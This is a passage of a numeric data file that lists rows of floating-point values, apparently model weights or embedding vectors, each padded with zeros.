-0.0881579, 0.200769, 0.425819, 0.0965846, -0.0753018, -0.750421, -0.00707303, -0.39119, -0.0878193, 0.00597812, 0.587756, -0.00515508, -0.376093, 0.788013, 0.25268, 0.56158, -0.244684, 0.166959, -0.23878, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.215232, -0.332192, 0.581775, 0.849731, 0.232868, -0.384862, 0.454779, 1.06628, -1.53175, -0.437413, -0.000891389, -0.864052, 0.744251, -0.246933, -0.748211, -1.02875, -0.647682, 0.412396, 1.26901, -0.00890172, 0.760236, 0.0143065, -0.519666, -0.236022, 0.00326571, 0.219099, -1.03715, -0.58066, 0.133119, -0.46123, -1.72349, 0.440651, 0.589092, 0.00984484, 0.348521, -0.768334, -0.300325, -0.0240105, -0.644858, -3.92457, -0.0447785, -0.147626, -0.0905136, 0.566946, 0.828233, -0.524815, -0.719074, 0.230884, -1.19663, -1.16548, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.217583, 0.333111, 0.493664, 0.0417539, -0.230071, -0.175113, 0.41028, 0.188505, 0.191782, 0.19362, 0.118873, -0.0553961, -0.00471752, -0.153423, -0.00139437, -0.102633, 0.162579, -0.130249, -0.128773, -0.0399848, -0.174619, -0.0427518, -0.0819146, 0.378912, 0.0140211, -0.0626778, -0.124141, -0.0796717, 0.00866501, 0.000679958, -0.0575875, 0.0391222, -0.184343, -0.255756, 0.181425, 0.315365, 0.366742, 0.00250051, 0.297935, -0.36375, 0.0428514, -0.00937842, -0.155904, 0.113848, -0.246159, -0.000628342, 0.0999237, 0.0401058, 0.3157, 0.0269517, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0361846, -0.079972, -0.0122646, -0.248673, 0.123096, -0.20429, -0.0238592, 0.116921, 0.0131277, 0.0390148, 0.103756, 0.0376938, 0.0176855, 0.0521339, -0.203624, -0.171873, -0.0578517, -0.251071, -0.0513175, -0.006293, 0.0581248, -0.0891104, 0.0602521, -0.562078, 0.0113607, -0.198882, 0.0879844, -0.036645, -0.128558, -0.0188689, -0.301694, -0.0980465, -0.0510968, -0.000773208, -0.0634559, -0.0350683, -0.0860132, 0.00452656, 0.0533589, 0.0725591, 0.207538, 0.0802486, 0.188831, -0.311167, -0.0370482, 0.0729221, 0.0244858, -0.0638124, -0.0676735, 0.119638, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.447263, 2.34394, -0.719156, -0.475018, -1.0442, 1.87757, 0.954614, 0.343229, 0.769032, -0.00889927, 1.26924, -0.0616709, -1.06716, -1.23351, -0.897188, 0.782972, -0.664572, -1.41441, -0.428873, 0.0170897, 0.148884, -0.466033, -1.03905, -1.34964, 0.0275522, -1.31459, -0.201804, -0.656499, 0.330619, 0.0687269, 0.86877, 0.474816, -0.681275, 0.559248, 0.136123, -1.09341, 1.9742, 0.041004, -0.32038, -0.57305, 0.228351, 0.198634, -0.517881, -0.759387, 0.136865, -0.804577, 1.22692, 1.21583, 0.27184, 0.977681, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0592019, 0.515292, 0.23911, -0.253845, -0.0637711, -0.24302, 0.139298, -4.48618, -0.772574, 0.203331, -0.357468, -0.507422, 0.137095, -3.87207, -0.126404, -1.80994, -0.0539826, 0.171511, -0.299418, -0.0298661, -0.0184131, -0.768662, -0.0386186, 0.624169, 0.0265789, 0.20526, 0.198946, 0.201547, -0.0787619, -2.15851, -1.19912, 0.161093, -0.0799011, 0.332071, 0.214417, 0.071333, 0.573987, -0.0411921, -0.0888816, -0.352414, -0.156212, 0.0375721, -0.484814, -0.181606, -0.00443685, 0.197816, -2.09587, 0.034354, 0.134472, -0.255745, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0770236, 0.323499, -0.122922, -0.283081, 0.012659, 0.128671, 0.13313, 0.323254, 0.278067, -0.0412072, -0.176968, -0.323106, -0.435142, 1.11093, -0.121036, 0.0490678, 0.463963, -0.197574, 0.620132, 0.0498911, 0.10769, 0.282115, -0.739223, 1.27729, 0.0120496, 0.33297, -0.605893, -0.290694, -0.11858, 0.209412, 0.222364, -0.0473744, -0.595239, 0.171952, -0.180779, 0.710632, 1.39216, -0.0298722, -0.275149, 0.15668, -0.168725, -0.139975, -0.262862, -0.943151, 0.0267816, 0.251369, 0.222639, -0.198706, -0.176242, 0.0187519, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0909438, 0.446264, -0.12297, 0.32853, -0.0475922, -0.181384, 0.502106, -0.977787, 0.0276056, 0.622991, 0.277136, -0.0385022, -0.332273, 0.628767, 0.518368, -0.325077, -0.553154, 0.273475, 0.336867, 0.0127586, -0.287662, 0.0477017, 0.183786, 1.1639, 0.000681529, 0.154739, 0.148147, 0.382008, 0.0431839, 0.386375, -0.70342, -0.182039, -0.281463, -1.66405, -1.69371, 0.0528063, -0.31867, 0.0497363, 0.126526, 0.764243, -0.685533, 0.0460264, -0.175967, -0.11104, -0.428309, 0.598624, 0.173099, 0.600506, -0.287064, 0.377165, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.254107, 0.0255782, 1.00819, -0.686272, -0.40238, -0.9787, 0.173623, -0.22214, 0.0568515, 0.0609026, -0.397584, -0.335516, 0.341586, -0.016373, -0.270763, 0.0408629, 0.0191987, 0.0726026, 0.543891, -0.0094275, 0.501585, -0.186836, -0.164464, 0.915471, 0.000546313, -0.885644, 0.102587, -0.0142789, -0.0207634, -0.518432, -0.204218, 0.349384, -0.556597, -0.512539, -0.432019, 0.00983373, 0.946167, -0.00518444, -0.19851, -0.23748, 0.493114, -0.43727, 0.0479027, -0.602917, 0.362551, -0.399757, -0.148382, 0.01091, -0.451516, -0.993905, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.459758, 0.520354, -0.121305, -0.780212, 0.18052, 0.02329, -0.268215, -0.549481, -0.183309, 0.535353, 1.14021, -1.05518, -0.700147, 0.611426, 0.239386, 0.169951, -0.0630512, -2.04573, 0.451542, -0.0467536, 0.288194, 0.046593, -0.763327, 0.523442, 0.0457224, 1.23234, -3.31972, 0.26318, 0.0514454, 0.263166, 0.483409, -0.147263, -0.0885286, -0.277593, -6.46551, 0.280305, -1.28263, 0.0370086, 0.664247, 0.309804, -0.463115, -2.33773, 0.233339, 0.392515, -0.379144, -0.0607305, 0.235496, 0.0952659, -2.96917, 0.0743473, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.285952, -0.871586, 0.888239, -0.0364492, -0.512282, -0.00203466, 0.0189644, 0.298361, 0.200815, -0.0919211, -0.533476, -1.1145, -0.0765846, -0.639078, 0.965904, 0.142076, -0.190197, 0.241752, -1.43351, 0.0493952, -0.134082, -0.409121, -0.652386, -0.619101, -0.0178322, -0.868774, -0.494859, -0.312532, 0.34638, -0.469054, -0.435009, 0.704507, 0.765912, -0.852589, -0.887224, -0.285932, 0.681342, 0.0438619, 0.488122, -0.557135, 0.302997, -0.31698, 0.151532, -2.42914, -0.192076, -0.654068, 0.451275, 1.33218, -1.38899, -0.385729, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.357836, 0.748835, -0.510494, -0.217073, -0.851313, 0.764035, -0.0532761, 0.621291, 0.098612, 0.0637257, 1.30833, 0.150276, -0.41462, -0.319508, -0.815441, 0.470836, 0.200124, 0.844909, -0.195831, -0.0206229, -0.600133, -0.0669954, 0.605397, -1.09666, -0.00884459, 0.612709, 0.258529, -0.0477622, -0.754763, 0.0535894, 0.275829, -0.580797, -0.869329, 2.03866, -1.60972, 0.110631, -0.0548995, -0.0316925, -0.491015, -0.186974, -0.794043, 1.0444, -0.0548548, -1.20414, -0.774934, -0.0742906, 0.584991, -0.762577, 0.543872, -0.391631, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0433029, -0.416297, 0.100833, -0.140765, -0.0806606, 0.219095, 0.206728, 0.0663828, -0.196497, 0.279787, 0.181412, -0.246325, -0.218983, -0.0521902, -0.142637, 0.125832, -0.125239, -0.52815, -0.21628, -0.0345887, -0.0947163, 0.187604, 0.322778, -0.847525, -0.000822361, -0.256595, -0.167658, -0.347077, -0.0964017, 0.160761, -0.548702, -0.238669, -0.0914534, 0.571479, -0.535026, 0.111271, 0.405719, -0.0119787, 0.0880991, 0.0616779, 0.0905116, 0.0356997, -0.0893788, -1.87599, 0.141219, -0.0989212, 0.0796625, -0.482802, 0.13512, -0.110484, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [2.41089, -1.62506, -0.826777, 0.131096, 0.833164, -1.07523, 0.18802, -0.0158331, -1.31226, -1.32343, -1.19783, -1.6955, 0.165601, 0.0813795, -2.91451, 0.23938, -0.230521, 0.660564, 0.204835, 0.0337254, 0.640985, -0.200261, -0.227493, -2.62375, 0.00863024, -0.558379, -0.386992, -0.140466, -0.512344, 0.884717, 0.904379, 0.292494, 0.0722427, 2.50082, -0.808813, 2.09373, -2.02111, -0.0173944, -1.58558, 0.72582, 1.33588, -2.59187, -1.01406, -2.6517, 0.86855, 0.555251, -3.02315, -0.406161, -1.53505, 0.32331, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.108144, -0.300965, 0.198315, -1.15252, 0.00948435, 0.382935, 1.00755, 0.115352, -0.0281023, 0.778977, 0.556634, -1.01673, -0.0221591, -2.47774, 0.541421, 0.119832, -0.592949, -1.83522, 0.700277, 0.0470511, 0.194825, -0.140949, -1.20612, 0.645988, 0.0465834, -0.192558, -0.505059, -0.541434, 0.0271444, -0.404642, 0.674715, -0.190003, -0.64834, -0.864725, -0.0480265, 0.721166, 1.75514, -0.0229177, 0.575332, -0.322199, 0.348122, -0.405276, -0.430428, -0.723799, -2.04604, 0.320812, 0.271943, 0.282795, 1.02252, 0.315606, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.210162, 0.377139, -0.403842, -0.238233, 0.0190874, 0.433008, 0.159434, -1.32987, 0.0202347, 0.350762, 0.39257, 0.390121, -0.12117, -2.12579, -0.193717, 0.139923, -0.150963, -0.121785, 0.137056, 0.0472637, -0.0294163, -0.343559, 0.587668, -0.644008, 0.0295421, 0.189381, 0.260512, 0.253692, -0.639447, -0.179132, -0.138419, -0.362271, -0.553211, -0.129934, -0.0658039, 0.0959287, 0.187381, -0.0395595, 0.277304, 0.0441888, -0.165279, 0.369496, 0.0330683, 0.526698, -0.414669, -0.631862, 0.517002, -0.382735, 0.112381, 0.174892, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0603485, 0.0234923, 0.268847, 0.575348, -0.741335, 0.497345, 0.296786, -2.04421, -0.708027, 0.613444, -1.04578, 0.309592, 0.0615601, -1.9809, 0.329142, 0.523389, -0.275038, 0.407382, 0.440782, 0.00952029, -1.01238, -0.182565, 0.107518, 0.122857, -0.0426125, 0.380417, -0.178499, 0.0147519, -0.137907, -1.22669, -0.288971, -0.0185793, -0.273388, 1.5778, -0.0687859, 0.069317, 0.615365, 0.010573, -0.0698254, -0.162375, 0.347239, 0.205983, -0.281441, -1.02307, -0.312022, -0.209126, 0.114547, 0.0323694, -0.114027, 0.0163688, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00442902, 0.839853, -0.0100435, 0.321324, -0.305274, -0.218769, 0.00436133, -0.883695, -0.1289, 0.188632, 0.197957, 0.269262, 0.159596, 0.470647, -0.145572, 0.277401, -0.981907, 0.490607, -0.630832, -0.0312579, 0.118161, -0.114769, 0.720389, -0.055988, -0.0257096, 0.246717, 0.385741, 0.283412, 0.0326635, -0.320576, -3.86593, 0.181242, 0.876639, 0.306347, 0.505138, -0.673902, -2.64392, 0.0272447, 0.256333, -1.02255, -0.250874, -0.0286263, 0.297325, 2.36327, -0.18509, -0.586485, -0.0736053, 0.544031, -0.208321, -0.292522, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-3.02031, 1.566, -3.1468, -6.00822, 1.68889, -3.46644, 1.36785, 1.62156, -0.787889, -0.912853, -3.46163, -2.00832, 0.950419, -3.41412, -13.1709, 1.45211, -2.13336, -4.89634, 1.28512, -0.0317827, 1.23512, 0.234386, -2.64226, 0.238238, -0.0234203, -2.79169, -2.04116, 0.263029, -0.17351, -2.10962, -5.37091, 1.47592, -0.894236, 1.99582, -4.51311, 1.34604, -6.56291, -0.016801, 1.00665, -5.72413, -0.0361098, -7.03096, -0.541493, -8.06534, 0.205915, -2.01471, -2.72852, 0.375396, -7.08815, -0.995415, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.230539, 0.78119, -0.305792, -0.225856, -0.561345, -1.46006, -0.408929, 0.124284, -0.0700589, -0.113292, -2.63192, 0.314629, 0.305446, -2.67951, -0.717398, -1.06053, 0.19749, 0.0960075, 0.656871, -0.0113087, 0.0112421, 0.446883, -0.394166, -0.483058, 0.0274199, -0.0933408, -0.0459104, -0.150368, 0.0938811, 0.255223, -9.34441, -0.0600621, -0.591192, 0.647825, 0.242702, -0.0971076, -1.19003, -0.0435294, -0.0920452, -0.30971, -0.203719, -0.566556, 0.104028, -3.39175, 0.585825, 0.0286875, -0.257401, 0.248378, 0.444376, 0.0446599, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0687898, -0.683721, 0.286262, -0.676821, 0.112379, -0.526663, 0.210065, -1.30148, 0.0415488, 0.504214, -0.393646, -0.153767, -0.35126, -0.23759, 0.303906, -0.0578774, -0.532785, 0.5118, -0.510945, -0.0305743, 0.00832864, 0.165699, -0.123743, 0.320346, 0.0125233, -0.789001, -0.233746, -0.113902, 0.0768009, -0.1502, 0.189723, 0.119955, -0.315111, 0.434449, -0.480134, 0.831122, -0.877712, 0.0242347, 0.356711, -0.336431, -0.0188672, -0.170903, 0.115289, -2.74345, 0.284392, 0.0604477, 0.338903, 0.424516, -0.0233846, 0.215107, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.414511, 0.136261, -0.0600875, 0.339552, 0.0514344, -0.271088, -0.243005, 0.370475, 0.171619, 0.235355, 0.103386, -0.411142, -0.0852257, -3.93079, 0.637717, -0.759663, -0.106099, 0.239224, 0.0795712, 0.00497962, -0.514372, 0.164885, 0.259969, 0.329819, -0.00592358, 0.683025, -0.504548, 0.162416, -0.110852, -0.0598116, 1.43517, -0.275648, -0.0110099, 0.142208, 0.0201649, -0.332445, -1.34796, 0.0476049, 0.388066, -0.571529, -0.300937, -0.181822, 0.0863441, -2.03682, 0.142363, -0.15876, -0.214809, -0.192197, 0.10632, 0.0285164, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.324612, 0.916644, 0.621455, 0.357618, 0.0345054, -0.276184, -0.201231, 0.256104, 0.155517, 0.152807, -0.0616519, 0.0978553, 0.165679, -1.77874, 0.456725, -0.439168, 0.0387082, 0.0993453, 0.463254, -0.0448257, -0.259973, 0.156005, 0.0990992, 0.120151, -0.00783338, 0.100165, 0.371636, 0.0494161, 0.409908, -0.373616, -0.877059, 0.283091, 0.028336, -0.467666, 0.631997, -0.428457, 0.532849, -0.00409609, -0.241603, -0.150002, 0.0774017, -0.187154, 0.243124, 1.09842, -0.274917, 0.0731125, -0.287736, 0.314341, 0.639913, -0.178678, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-4.08871, -1.8082, 1.84166, -1.12629, 0.530201, 0.202222, 0.376116, -0.86772, -1.7774, -2.09831, -0.45749, -0.737517, 0.585849, 0.10502, 1.72886, 0.692817, -1.31767, 1.20079, -0.374831, -0.0207036, -0.369592, 0.40584, -0.906016, -4.95034, -0.0381483, -2.86956, -1.09537, 0.682012, -0.217794, -0.506311, -0.252425, 0.785354, -0.353075, 3.35127, -2.07647, -1.45178, -0.0877346, 0.0495282, 1.11189, -2.72542, -0.179078, -0.707539, 0.263581, 0.215376, -3.64249, -0.264756, -1.41551, 1.37657, -1.85277, -0.78059, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.383422, -0.0284065, 0.087133, 0.0931196, 0.164841, -0.364064, 0.651404, -1.4823, 0.0172269, -1.82474, 0.208926, -1.35132, -0.433627, -0.239893, 0.126217, 0.0530793, 0.234489, -0.211085, -1.25031, 0.00707273, 0.482926, -0.852424, -0.137594, 0.86615, -0.0367426, -0.781451, -0.583006, 0.581821, -0.392725, -0.773366, 0.811804, -0.55046, -0.275705, 0.631768, -0.996308, 0.653303, -0.298784, 0.0155895, -0.555537, -0.812097, 0.904718, -1.69388, 0.1559, -0.277269, 0.212396, -0.373207, 0.920618, -0.0701261, -0.706152, -0.638607, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.471983, 0.837119, -0.330892, -1.67828, -0.244209, -0.490259, -0.172925, -1.39241, -0.565257, -1.06744, -0.315526, 0.245198, 0.261793, 2.04893, -0.92776, -1.97889, 0.151144, -0.300798, -0.0124347, 0.0390675, 0.344207, -0.342577, -1.10444, 0.639264, 0.0431252, -0.335031, -0.393348, 0.19617, -0.231878, 0.502312, -2.34856, 0.100049, -0.304427, -0.339954, 0.654426, 0.157273, -0.478207, 0.000148418, 0.189041, -0.00179308, 0.00456751, 0.0613986, -0.0166205, -0.865483, 0.659393, -0.642149, 0.186779, 0.137543, -0.526351, 0.0994014, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.290284, 0.305784, 0.864206, -0.908854, 0.00175597, 0.208558, -0.862763, 0.513859, 0.243665, 0.317073, 0.426666, -0.866842, 0.287274, -0.315787, -0.322341, -0.560977, 0.0326614, -0.143722, -0.136812, 0.031198, 0.010898, 0.0295527, -0.0176961, 2.17577, -0.0110202, -0.269706, 0.0377319, 0.279166, 0.0275709, -0.249412, 0.00806171, -0.226273, -0.615702, -0.49141, 0.575461, 0.0983534, -0.083624, -0.0120909, 0.730296, -0.169963, 0.0288122, -0.0833977, -0.129491, -1.44739, 0.148493, 0.338998, -0.50266, 0.0557751, -0.0847156, -0.342571, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.291413, 0.970204, 0.323319, -0.633429, 0.190727, 